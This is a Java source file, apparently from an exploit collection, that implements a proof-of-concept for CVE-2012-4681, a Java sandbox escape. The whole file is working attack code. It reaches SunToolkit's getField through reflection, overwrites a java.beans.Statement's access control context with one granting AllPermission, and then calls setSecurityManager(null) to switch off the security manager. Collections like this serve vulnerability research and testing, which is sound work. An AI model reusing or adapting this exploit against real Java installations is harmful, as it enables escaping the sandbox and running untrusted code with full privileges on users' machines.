/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/
package cve20124681;
import java.awt.Toolkit;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
/*
* This is the same as CVE_2012_4681, except that we use a simpler way to get
* a handle to SunToolkit.
*/
public class CVE_2012_4681a {
public final static Object o = null;
public static void main(String[] args) throws Throwable {
System.setSecurityManager(new SecurityManager());
System.out.println("SecurityManager: " + System.getSecurityManager());
disableSecurity();
System.out.println("SecurityManager: " + System.getSecurityManager());
}
private static void disableSecurity() throws Throwable {
Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
overrideStatementAccessControlContext(localStatement);
localStatement.execute();
}
private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
AccessControlContext acc = createDummyAccessControlContext();
Field privateField = getPrivateField(Statement.class, "acc");
privateField.set(statement, acc);
}
private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
}
private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
localExpression.execute();
return (Field) localExpression.getValue();
}
// alternative to get a handle to SunToolkit, at least on OSX
private static Class<?> loadSunToolkit() throws Throwable {
Toolkit defaultToolkit = Toolkit.getDefaultToolkit();
Class<?> c2 = defaultToolkit.getClass().getSuperclass().getSuperclass();
return c2;
}
}